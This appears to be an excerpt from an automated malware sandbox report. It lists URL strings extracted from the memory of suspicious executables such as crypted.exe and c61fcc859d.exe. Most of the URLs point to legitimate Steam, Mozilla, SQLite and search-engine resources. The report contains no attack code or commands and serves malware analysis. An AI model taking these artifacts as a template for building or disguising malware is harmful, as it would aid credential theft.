                    Source: c61fcc859d.exe, 00000017.00000003.2597838654.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2572394052.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570490116.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/p
                    Source: crypted.exe, 00000013.00000002.2528369086.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2745036681.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: crypted.exe, 00000013.00000002.2528369086.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2597838654.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2572394052.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570490116.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2745036681.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: Amcache.hve.22.drString found in binary or memory: http://upx.sf.net
                    Source: powershell.exe, 0000000D.00000002.2454333796.00000144DD57A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260816C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 0000001A.00000002.2596038718.0000026081874000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260816C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: pidgeon.exe, 0000000C.00000000.2414950522.000000000042B000.00000020.00000001.01000000.0000000F.sdmp, pidgeon.exe, 0000000C.00000002.2976135543.000000000331C000.00000004.00001000.00020000.00000000.sdmp, pidgeon.exe, 00000019.00000002.2975405348.00000000030AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
                    Source: file.exe, file.exe, 00000000.00000002.1981502028.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: file.exe, 00000000.00000002.1980554602.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972584354.000000001D4CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: powershell.exe, 0000000D.00000002.2454333796.00000144DBEC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.0000026080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                    Source: c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: file.exe, 00000000.00000002.1975345843.00000000234F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2599723843.0000000005775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                    Source: file.exe, 00000000.00000002.1975345843.00000000234F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2599723843.0000000005775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                    Source: c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fa
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.0000000001061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fast
                    Source: c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.c
                    Source: crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.c/
                    Source: c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=h6HMV-M6cfAX&a
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=1Zpka7DM_TWk&l=english
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=qM6wpZLwO_gf&amp
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&l=engli
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=g2Zx7e0yBV_M&l=english
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=ftiDdX_V0QeB&l=englis
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: crypted.exe, 00000013.00000002.2528369086.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2614055476.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2614392992.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2597838654.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2572394052.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570490116.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2745036681.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=KLqJaM1v
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=TONm
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=0IXKH44IpF1u&l=english
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=1vfyNnvUqkgy&l=engl
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&l=english
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=Gr5o1d5GQef0&l=en
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=g9lbYg_WDvLO&l=e
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=HNbD--FePQTr&l=english
                    Source: c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&l=engl
